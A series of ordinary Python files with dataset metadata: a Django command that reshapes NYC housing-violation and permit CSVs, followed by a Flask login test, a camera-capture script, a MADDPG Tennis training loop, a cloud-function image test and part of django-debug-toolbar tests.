str(row[7]).strip()\n\t\t\tblock = str(row[8]).strip()\n\t\t\tlot = str(row[9]).strip()\n\t\t\twork_type_general = str(row[11]).strip()\n\t\t\t#put this address in a csv to geocode\n\t\t\taddress = house_number + \" \" + streetname + \" \" + borough + \", \" + \"NY\" + \" \" + zip_code\n\t\t\taddress_list = (house_number, streetname, boro, zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\n\t\t\thwo_number = str(row[1]).strip()\n\t\t\thwo_create_date = str(row[13]).strip()\n\t\t\tmonth = hwo_create_date[:2]\n\t\t\tday = hwo_create_date[3:5]\n\t\t\tyear = hwo_create_date[6:10]\n\t\t\thwo_description = str(row[18]).strip()\n\t\t\tcommunity_board='NA'\n\t\t\tnew_row = (hwo_create_date, building_id, borough, house_number, streetname, zip_code, boro+block+lot, work_type_general, hwo_number, year, month, hwo_description)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\n\ndef process_ecb_violations(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'respondents.csv', 'a') as landlord_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = 
csv.writer(address_write)\n\t\trespondents = csv.writer(landlord_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(isn_dob_bis_extract0, ecb_violation_number1, ecb_violation_status2, dob_violation_number3, building_id4, boro5, block6, lot7, hearing_date8, hearing_time9, served_date10, issue_date11, severity12, violation_type13, respondent_name14, respondent_house_number15, respondent_street16, respondent_city17, respondent_zip18, violation_description19, penalty_imposed20, amount_paid21, balance_due22, infraction_code23, section_law_description24, blank25, blank26, blank27, blank28, blank29, blank30, blank31, blank32, blank33, blank34, blank35, blank36, blank37, blank38, blank39, blank40, blank41, blank42, aggravated_level43, hearing_status44, certification_status45) = row\n\t\t\tbuilding_id = str(row[4]).strip()\n\t\t\tboro = str(row[5]).strip()\n\t\t\tblock = str(row[6]).strip()\n\t\t\tlot = str(row[7]).strip()\n\t\t\tviolation_number = str(row[1]).strip()\n\t\t\trespondent_name = str(row[14]).strip()\n\t\t\trespondent_house_number = str(row[15]).strip()\n\t\t\trespondent_street = str(row[16]).strip()\n\t\t\trespondent_zip = str(row[18]).strip()\n\t\t\trespondent_row = (building_id, respondent_name, respondent_house_number, respondent_street, respondent_zip)\n\t\t\trespondents.writerow(respondent_row)\n\t\t\tdob_violation_number = str(row[3]).strip()\n\t\t\thearing_date = str(row[8]).strip()\n\t\t\thearing_status = str(row[44]).strip()\n\t\t\tviolation_description = str(row[19]).strip()\n\t\t\tsection_law_description = str(row[24]).strip()\n\t\t\tseverity = str(row[12]).strip()\n\t\t\tpenalty_imposed = str(row[20]).strip()\n\t\t\tamount_paid = str(row[21]).strip()\n\t\t\tbalance_due = str(row[22]).strip()\n\t\t\tviolation_type = str(row[13]).strip()\n\t\t\tissue_date = str(row[11]).strip()\n\t\t\tissue_year = issue_date[:4]\n\t\t\tissue_month = issue_date[4:6]\n\t\t\thouse_number='NA'\n\t\t\tstreetname='NA'\n\t\t\tzip_code='NA'\n\t\t\tborough='NA'\n\t\t\tcommunity_board='NA'\n\t\t\tnew_row = (building_id, boro+block+lot, issue_date, issue_year, issue_month, violation_description, severity, penalty_imposed, amount_paid, balance_due, violation_type, violation_number, dob_violation_number, hearing_date, hearing_status, respondent_name)\n\t\t\twriter.writerow(new_row)\t\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_dob_violations(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(col0, boro1, building_id2, block3, lot4, issue_date5, viol_type_code6, violation_number7, house_number8, street9, disposition_date10, disp_comments11, device_number12, description13, ecb_number14, number15, violation_category16, violation_type17) = row\n\t\t\tbuilding_id = str(row[2]).strip()\n\t\t\thouse_number = str(row[8]).strip()\n\t\t\tstreetname = str(row[9]).strip()\n\t\t\tzip_code = 'NA'\n\t\t\tboro = str(row[1]).strip()\n\t\t\tblock = 
str(row[3]).strip()\n\t\t\tlot = str(row[4]).strip()\n\t\t\tboroughs = ['MANHATTAN', 'BRONX', 'BROOKLYN', 'QUEENS', 'STATEN ISLAND']\n\t\t\ttry:\n\t\t\t\tborough = boroughs[int(boro) - 1]\n\t\t\texcept ValueError:\n\t\t\t\tborough = 'NA'\n\t\t\t\tpass\n\t\t\ttry:\n\t\t\t\taddress_list = (house_number, streetname, boro)\n\t\t\t\t#address_row = (building_id, address)\n\t\t\t\taddresses.writerow(address_list)\n\t\t\texcept TypeError:\n\t\t\t\tpass\n\t\t\tdob_violation_number = str(row[7]).strip()\n\t\t\tviolation_type_code = str(row[6]).strip()\n\t\t\tviolation_category = str(row[16]).strip()\n\t\t\tissue_date = str(row[5]).strip()\n\t\t\tissue_year = issue_date[:4]\n\t\t\tissue_month = issue_date[4:6]\n\t\t\tissue_day = issue_date[6:8]\n\t\t\tdescription = str(row[13]).strip()\n\t\t\tcommunity_board = 'NA'\n\t\t\tnew_row = (issue_date, building_id, house_number, streetname, borough, dob_violation_number, boro+block+lot, violation_type_code, violation_category, issue_year, issue_month, description)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_dob_complaints(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(complaint_number0, status1, date_entered2, house_number3, house_street4, building_id5, community_board6, special_district7, complaint_category8, unit9, disposition_date10, disposition_code11, inspection_date12, dob_run_date13) = row\n\t\t\tbuilding_id = str(row[5]).strip()\n\t\t\thouse_number = str(row[3]).strip()\n\t\t\tstreetname = str(row[4]).strip()\n\t\t\tzip_code = 'NA'\n\t\t\tborough='NA'\n\t\t\tboro='NA'\n\t\t\tblock='NA'\n\t\t\tlot='NA'\n\t\t\tcommunity_board = str(row[6]).strip()\n\t\t\tcomplaint_category_number = str(row[8]).strip()\n\t\t\tcomplaint_number = str(row[0]).strip()\n\t\t\tdate_entered = str(row[13]).strip()\n\t\t\tmonth_entered = date_entered[:2]\n\t\t\tday_entered = date_entered[3:5]\n\t\t\tyear_entered = date_entered[6:10]\n\t\t\tinspection_date =str(row[12]).strip()\n\t\t\tunit = str(row[9]).strip()\n\t\t\tnew_row = (date_entered, building_id, complaint_category_number, complaint_number, month_entered, year_entered, house_number, streetname, inspection_date, unit)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_dob_work_permits(file_name, new_file_name):\n\t\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\t#next(reader_object)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\t\t\n\t\t\ttry:\t\t\n\t\t\t\t(borough0, building_id1, house_number2, street3, 
jobnumber4, jobdocnumber5, jobtype6, self_cert7, block8, lot9, community_board10, zip_code11, bldg_type12, residential13, special_district114, special_district15, work_type16, permit_status17, filing_status18, permit_type19, permit_sequence_number20, permit_subtype21, oil_gas22, site_fill23, filing_date24, issuance_date25, expiration_date26, job_start_date27, permittee_first_name28, permittee_last_name29, permittee_business_name30, permittee_phone31, permittee_license_type32, permittee_license_number33, blank34, blank35, blank36, blank37, blank38, blank39, blank40, blank41, owner_bus_type42, non_profit43, owner_business_name44, owner_first_name45, owner_last_name46, owner_house_number47, owner_street_name48, owner_city49, owner_state50, owner_zip_code51, owner_phone52, dob_run_date53) = row\n\t\t\texcept ValueError:\n\t\t\t\tprint(row)\n\t\t\tbuilding_id = str(row[1]).strip()\n\t\t\tcommunity_board = str(row[10]).strip()\n\t\t\tborough = str(row[0]).strip()\n\t\t\tboroughs = ['MANHATTAN', 'BRONX', 'BROOKLYN', 'QUEENS', 'STATEN ISLAND']\n\t\t\ttry:\n\t\t\t\tboro = str(boroughs.index(borough) + 1)\n\t\t\texcept ValueError:\n\t\t\t\tboro = str(0)\n\t\t\t\tpass\n\t\t\thouse_number = str(row[2]).strip()\n\t\t\tstreetname = str(row[3]).strip()\n\t\t\tblock = str(row[8]).strip()\n\t\t\tlot = str(row[9]).strip()\n\t\t\tzip_code = str(row[11]).strip()\n\t\t\taddress_list = (str(row[2]).strip(), str(row[3]).strip(), str(row[0]).strip(), zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\t\t\t\n\t\t\tdate_entered = str(row[25]).strip()\n\t\t\tmonth_entered = date_entered[:2]\n\t\t\tday_entered = date_entered[3:5]\n\t\t\tyear_entered = date_entered[6:10]\n\t\t\twork_type = str(row[16]).strip()\n\t\t\tpermit_license_type = str(row[19]).strip()\n\t\t\t\n\t\t\tpermit_filing_date = str(row[24]).strip()\n\t\t\tpermit_subtype = str(row[21]).strip()\n\t\t\tfiling_status = str(row[18]).strip()\n\t\t\texpiration_date = str(row[26]).strip()\n\t\t\tpermittees_business_name = str(row[30]).strip()\n\t\t\tjob_start_date = str(row[27]).strip()\n\t\t\tjob_number = str(row[4]).strip()\n\t\t\tnew_row = (date_entered, building_id, borough, house_number, streetname, boro+block+lot, year_entered, month_entered, zip_code, job_start_date, job_number, work_type, permit_license_type, permit_filing_date, permit_subtype, filing_status, expiration_date, permittees_business_name)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\n\ndef process_hpd_violations(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(violation_id0, building_id1, registration_id2, boro_id3, boro4, house_number5, lowhousenumber6, highhousenumber7, streetname8, streetcode9, zipcode10, apt_number11, story12, block13, lot14, class15, inspection_date16, approved_date17, originalcertifybydate18, originalcorrectbydate19, newcertifybydate20, newcorrectbydate21, certifieddate22, ordernumber23, novid24, novdescription25, novissuedate26, 
currentstatusid27, currentstatus28, currentstatusdate29) = row\n\t\t\thouse_number = str(row[5]).strip()\n\t\t\tstreetname = str(row[8]).strip()\n\t\t\tborough = str(row[4]).strip()\n\t\t\tzip_code = str(row[10]).strip()\n\t\t\tboro = str(row[3]).strip()\n\t\t\tblock = str(row[13]).strip()\n\t\t\tlot = str(row[14]).strip()\n\t\t\t#no building ID number so setting it to 00000 for now in addresses file\n\t\t\t#building_id = '0'\n\t\t\taddress_list = (house_number, streetname, borough, zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\n\t\t\tcurrent_status = str(row[28]).strip()\n\t\t\tcurrent_status_date = str(row[29]).strip()\n\t\t\t#HPD-specific building ID\n\t\t\thpd_building_id = str(row[1]).strip()\n\t\t\tapartment_number = str(row[11]).strip()\n\t\t\tviolation_description = str(row[25]).strip()\n\t\t\tviolation_id = str(row[0]).strip()\n\t\t\tnotice_of_violation_id = str(row[24]).strip()\n\t\t\tnotice_of_violation_date = str(row[26]).strip()\n\t\t\tnov_month = notice_of_violation_date[:2]\n\t\t\tnov_day = notice_of_violation_date[3:5]\n\t\t\tnov_year = notice_of_violation_date[6:10]\n\t\t\tcommunity_board = 'NA'\n\t\t\tbuilding_id = 'NA'\n\t\t\tnew_row = (notice_of_violation_date, hpd_building_id, house_number, streetname, borough, community_board, boro+block+lot, zip_code, current_status, current_status_date, apartment_number, violation_description, violation_id, nov_month, nov_year, notice_of_violation_id)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_hpd_complaints(file_name, new_file_name):\n\t\"\"\"HPD complaints are connected by foreign key complaint_id to HPD complaint problems dataset\n\t\"\"\"\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(complaint_id0, building_id1, borough_id2, borough3, housenumber4, streetname5, zipcode6, block7, lot8, apt_number9, communityboard10, receiveddate11, statusid12, status13, statusdate14) = row\n\t\t\thouse_number = str(row[4]).strip()\n\t\t\tstreetname = str(row[5]).strip()\n\t\t\tborough = str(row[3]).strip()\n\t\t\tzip_code = str(row[6]).strip()\n\t\t\tboro = str(row[2]).strip()\n\t\t\tblock = str(row[7]).strip()\n\t\t\tlot = str(row[8]).strip()\n\t\t\t#no building ID number so setting it to 00000 for now in addresses file\n\t\t\tbuilding_id = 'NA'\n\t\t\taddress_list = (house_number, streetname, boro, zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\n\t\t\thpd_building_id = str(row[1]).strip()\n\t\t\tcomplaint_id = str(row[0]).strip()\n\t\t\tapartment_number = str(row[9]).strip()\n\t\t\treceived_date = str(row[11]).strip()\n\t\t\treceived_month = received_date[:2]\n\t\t\tnov_day = received_date[3:5]\n\t\t\treceived_year = received_date[6:10]\n\t\t\tstatus = str(row[13]).strip()\n\t\t\tstatus_date = str(row[14]).strip()\n\t\t\tcommunity_board = str(row[10]).strip()\n\t\t\tzip_code = 'NA'\n\t\t\tnew_row = (received_date, complaint_id, hpd_building_id, boro+block+lot, 
house_number, streetname, zip_code, apartment_number, received_month, received_year, status, status_date)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef hpd_complaint_problems_data(file_name, new_file_name):\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(problem_id0, complaint_id1, unittypeid2, unittype3, spacetypeID4, spacetype5, typeID6, type7, majorcategoryID8, majorcategory9, minorcategory_id_10, minorcategory_11, code_id_12, code_13, status_id_14, status_15, status_date_16, status_description_17) = row\n\t\t\tmajor_category = str(row[9]).strip()\t\t\t\n\t\t\tcomplaint_id = str(row[1]).strip() \n\t\t\tproblem_id = str(row[0]).strip()\n\t\t\tunit_type = str(row[3]).strip()\n\t\t\tspace_type = str(row[4]).strip()\n\t\t\tminor_category = str(row[11]).strip()\n\t\t\thpd_code = str(row[13]).strip()\n\t\t\tstatus = str(row[15]).strip()\n\t\t\tstatus_date = str(row[16]).strip()\n\t\t\tviolation_issued = str(row[17]).strip()\n\t\t\tnew_row = (complaint_id, problem_id, unit_type, space_type, major_category, minor_category, hpd_code, status, status_date, violation_issued)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\n\ndef open_market_order_data(file_name, new_file_name):\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f:\n\t\twriter = csv.writer(write_file)\n\t\treader_object = csv.reader(f)\n\t\tnext(reader_object)\n\t\theader_row = ('omo_year', 'omo_month', 'building_id', 'bbl', 'borough', 'house_number', 'street_name', 'apartment', 'zip_code', 'omo_id', 'omo_number', 'work_type_general', 'omo_status_reason', 'omo_create_date', 'omo_description')\n\t\twriter.writerow(header_row)\n\t\tfor row in reader_object:\n\t\t\tomo_id = str(row[0]).strip()\n\t\t\tomo_number = str(row[1]).strip()\n\t\t\tbuilding_id = str(row[2]).strip()\n\t\t\tboro_id = str(row[3]).strip()\n\t\t\tblock = str(row[9]).strip()\n\t\t\tlot = str(row[10]).strip()\n\t\t\tborough = str(row[4]).strip()\n\t\t\thouse_number = str(row[5]).strip()\n\t\t\tstreet_name = str(row[6]).strip()\n\t\t\tapartment = str(row[7]).strip()\n\t\t\tzip_code = str(row[8]).strip()\n\t\t\twork_type_general = str(row[12]).strip()\n\t\t\tomo_status_reason = str(row[13]).strip()\n\t\t\tomo_create_date = str(row[15]).strip()\n\t\t\tomo_month = omo_create_date[:2]\n\t\t\tomo_day = omo_create_date[3:5]\n\t\t\tomo_year = omo_create_date[6:]\n\t\t\tomo_description = str(row[23]).strip()\n\t\t\tnew_row = (omo_year, omo_month, building_id, boro_id+block+lot, borough, house_number, street_name, apartment, zip_code, omo_id, omo_number, work_type_general, omo_status_reason, omo_create_date, omo_description)\n\t\t\twriter.writerow(new_row)\n\treturn\n\n\nclass Command(BaseCommand):\n\n\tdef handle(self, *args, **options):\n\t\t\"\"\"\n\t\tprint(\"processing HPD complaint problems data...\")\n\t\thpd_complaint_problems = 
hpd_complaint_problems_data('hpd_complaint_probs.csv', 'hpd_complaint_probs.csv')\n\t\tprint(\"processing HPD complaints data...\")\n\t\thpd_complaints = process_hpd_complaints('HPDcomplaints.csv', 'hpd_complaints.csv')\n\t\tprint(\"processing HPD violations data...\")\n\t\t\n\t\thpd_violations = process_hpd_violations('hpd_violations.csv', 'hpd_violations.csv')\n\t\tprint(\"processing DOB work permits data...\")\n\t\tdob_work_permits = process_dob_work_permits('DOB_Permit_Issuance.csv', 'work_permits.csv')\n\t\tprint(\"processing DOB Complaints data...\")\n\t\t\n\t\tdob_complaints = process_dob_complaints('DOB_Complaints_Received.csv', 'dob_complaints_received.csv')\n\t\tprint(\"processing DOB violations data...\")\n\t\tdob_violations = process_dob_violations('DOB_Violations.csv', 'dob_violations.csv')\n\t\tprint(\"processing DOB ECB violations data...\")\n\t\tecb_violations = process_ecb_violations('DOB_ECB_Violations.csv', 'dob_ecb_violations.csv')\n\t\tprint(\"processing Handyman Work Order data...\")\n\t\thwos = process_handyman_work_order('hwo.csv', 'handymanWO.csv')\n\t\t\"\"\"\n\t\towos = open_market_order_data('OpenMarketOrderCharges.csv', 'omo.csv')\n\n","sub_path":"analysis/management/commands/all_datasets.py","file_name":"all_datasets.py","file_ext":"py","file_size_in_byte":20839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322275744","text":"#!venv/bin/python\nimport os\nimport unittest\n\nfrom config import basedir\nfrom app import app, db\nfrom app.models import User\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self):\n app.config['TESTING'] = True\n app.config['CSRF_ENABLED'] = False\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'test.db')\n self.app = app.test_client()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_login(self):\n u1 = User(login='adm18@bank.srv', username='adm18')\n db.session.add(u1)\n db.session.commit()\n u2 = User(login='alecx@bank.srv', username='lol')\n\n User.query.filter_by(login=u1.login).first()\n assert User.query.filter_by(login=u1.login).first().id == 1\n assert User.query.filter_by(login=u2.login).first() is None\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90464920","text":"import threading\nimport cv2\nimport os\n\n# Define the thread that will continuously pull frames from the camera\nclass CameraBufferCleanerThread(threading.Thread):\n def __init__(self, camera, name='camera-buffer-cleaner-thread'):\n self.camera = camera\n self.last_frame = None\n super(CameraBufferCleanerThread, self).__init__(name=name)\n self.start()\n\n def run(self):\n while True:\n ret, self.last_frame = self.camera.read()\n\n# Start the camera\ncamera = cv2.VideoCapture(0)\ncamera.set(3,800)\ncamera.set(4,600)\n# Start the cleaning thread\ncam_cleaner = CameraBufferCleanerThread(camera)\ncount = 0\n\n# Use the frame whenever you want\nwhile True:\n if cam_cleaner.last_frame is not None:\n cv2.imshow('The last frame', cam_cleaner.last_frame)\n \n if cv2.waitKey(30) == ord('s'):\n if cam_cleaner.last_frame is not None:\n image_np = cam_cleaner.last_frame\n else:\n ret, image_np = camera.read()\n \n name = 'measure' + str(count) +'.jpg'\n path = '/home/tan/objectTrackingpic/measure/'\n 
cv2.imwrite(os.path.join(path,name),image_np)\n count += 1\n print('save')\n\n if cv2.waitKey(25) == ord('a'):\n break\n\n\ncv2.destroyAllWindows()\ncamera.release()\n\n","sub_path":"object_tracking/camera_take/scripts/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"318595554","text":"from unityagents import UnityEnvironment\nimport numpy as np\nimport logging\n\n'''Adding the environment This is the start point for training'''\n\nenv = UnityEnvironment(file_name=\"Tennis_Windows_x86_64/Tennis.exe\")\n\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\nenv_info = env.reset(train_mode=True)[brain_name]\nnum_agents = len(env_info.agents)\naction_size = brain.vector_action_space_size\nstates = env_info.vector_observations\nstate_size = states.shape[1]\n\nimport torch\nimport pickle\n\nfrom maddpg import MADDPG\n\nfrom collections import deque\nimport matplotlib.pyplot as plt\nimport time, os\n\nmaddpg = MADDPG(24, 2, 2, 1976)\nscores_max_hist = []\nscores_mean_hist = []\n\nlogger = logging.getLogger(__name__)\n\nf_handle = logging.FileHandler(\"Log_File.txt\")\nf_format = logging.Formatter('%(levelname)s: %(asctime)s %(message)s')\nf_handle.setFormatter(f_format)\nf_handle.setLevel(logging.INFO)\n\nlogger.addHandler(f_handle)\n\ndef maddpg_train(n_episodes=2500):\n\n scores_deque = deque(maxlen=100)\n solved = False\n\n for i_episode in range(n_episodes):\n env_info = env.reset(train_mode=True)[brain_name]\n state = env_info.vector_observations\n scores = np.zeros(num_agents)\n maddpg.reset()\n step = 0\n while True:\n step += 1\n action = maddpg.act(state, i_episode, add_noise=True)\n env_info = env.step(action)[brain_name]\n\n next_state = env_info.vector_observations\n reward = env_info.rewards\n done = env_info.local_done\n\n scores += reward\n\n maddpg.step(i_episode, state, action, reward, next_state, done)\n\n if np.any(done):\n break\n\n state = next_state\n\n score_max = np.max(scores)\n scores_deque.append(score_max)\n score_mean = np.mean(scores_deque)\n\n scores_max_hist.append(score_max)\n scores_mean_hist.append(score_mean)\n\n logger.info('Episode {}\\tAverage Score: {:.2f}'.format(i_episode, score_mean))\n if solved == False and score_mean >= 0.5:\n logger.info('Environment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode, score_mean))\n maddpg.save()\n solved = True\n\n if i_episode % 500 == 0:\n print()\n\nscores = maddpg_train()\n\nwith open('scores.data', 'wb') as filehandle:\n # store the data as binary data stream\n pickle.dump(scores, filehandle)\n\nenv.close()","sub_path":"p3-collabcontrol/Tennis.py","file_name":"Tennis.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29101930","text":"import base64\nimport os\nimport requests\nimport re\n\n\ndef test_gcfunction_local(xprocess, localserver, nakaguma_image_path):\n with open(nakaguma_image_path, \"rb\") as f:\n dataurl = 'data:image/png;base64,' + base64.b64encode(f.read()).decode()\n\n # Send HTTP request simulating Pub/Sub message\n # (GCF translates Pub/Sub messages to HTTP requests internally)\n try:\n res = requests.post(\n 'http://127.0.0.1:8080',\n json={'image_url': dataurl}\n )\n res.raise_for_status()\n except Exception as e:\n logfile = open(xprocess.getinfo(localserver).logpath, 'r')\n error_data = os.read(logfile.fileno(), 20000).decode(\"utf-8\")\n 
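# on failure, dump the captured local-server log to aid debugging before re-raising\n        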
print(error_data)\n raise e\n finally:\n xprocess.getinfo(localserver).terminate()\n res = res.json()\n\n # Check server response\n assert 'boxes' in res\n assert 'background' in res\n boxes = res['boxes']\n assert 'mask' in boxes['0']\n assert len(boxes['0']['mask']) > 100\n res = {id: {k: v for k, v in boxes[id].items() if k != 'mask'} for id in boxes}\n print('Boxes: ', boxes)\n assert '0' in boxes\n assert 'left' in boxes['0']\n assert 'top' in boxes['0']\n assert 'width' in boxes['0']\n assert 'height' in boxes['0']\n\n logfile = open(xprocess.getinfo(localserver).logpath, 'r')\n error_data = os.read(logfile.fileno(), 20000).decode(\"utf-8\")\n assert not re.search('Traceback', error_data)\n","sub_path":"test/test_gcfunction.py","file_name":"test_gcfunction.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"238856669","text":"# coding: utf-8\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport os\nimport unittest\nfrom xml.etree import ElementTree as ET\n\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom django.test import RequestFactory, TestCase\nfrom django.test.utils import override_settings\n\nfrom debug_toolbar.middleware import DebugToolbarMiddleware, show_toolbar\n\nfrom .base import BaseTestCase\nfrom .views import regular_view\n\ntry:\n from selenium import webdriver\n from selenium.common.exceptions import NoSuchElementException\n from selenium.webdriver.support.wait import WebDriverWait\nexcept ImportError:\n webdriver = None\n\n\nrf = RequestFactory()\n\n\n@override_settings(DEBUG=True)\nclass DebugToolbarTestCase(BaseTestCase):\n\n def test_show_toolbar(self):\n self.assertTrue(show_toolbar(self.request))\n\n def test_show_toolbar_DEBUG(self):\n with self.settings(DEBUG=False):\n self.assertFalse(show_toolbar(self.request))\n\n def test_show_toolbar_INTERNAL_IPS(self):\n with self.settings(INTERNAL_IPS=[]):\n self.assertFalse(show_toolbar(self.request))\n\n def _resolve_stats(self, path):\n # takes stats from Request panel\n self.request.path = path\n panel = self.toolbar.get_panel_by_id('RequestPanel')\n panel.process_request(self.request)\n panel.process_response(self.request, self.response)\n panel.generate_stats(self.request, self.response)\n return panel.get_stats()\n\n def test_url_resolving_positional(self):\n stats = self._resolve_stats('/resolving1/a/b/')\n self.assertEqual(stats['view_urlname'], 'positional-resolving')\n self.assertEqual(stats['view_func'], 'tests.views.resolving_view')\n self.assertEqual(stats['view_args'], ('a', 'b'))\n self.assertEqual(stats['view_kwargs'], {})\n\n def test_url_resolving_named(self):\n stats = self._resolve_stats('/resolving2/a/b/')\n self.assertEqual(stats['view_args'], ())\n self.assertEqual(stats['view_kwargs'], {'arg1': 'a', 'arg2': 'b'})\n\n def test_url_resolving_mixed(self):\n stats = self._resolve_stats('/resolving3/a/')\n self.assertEqual(stats['view_args'], ('a',))\n self.assertEqual(stats['view_kwargs'], {'arg2': 'default'})\n\n def test_url_resolving_bad(self):\n stats = self._resolve_stats('/non-existing-url/')\n self.assertEqual(stats['view_urlname'], 'None')\n self.assertEqual(stats['view_args'], 'None')\n self.assertEqual(stats['view_kwargs'], 'None')\n self.assertEqual(stats['view_func'], '')\n\n # Django doesn't guarantee that process_request, process_view and\n # process_response always get called in this order.\n\n def test_middleware_view_only(self):\n 
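# smoke test: process_view alone should not raise, since Django does not guarantee hook ordering\n        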
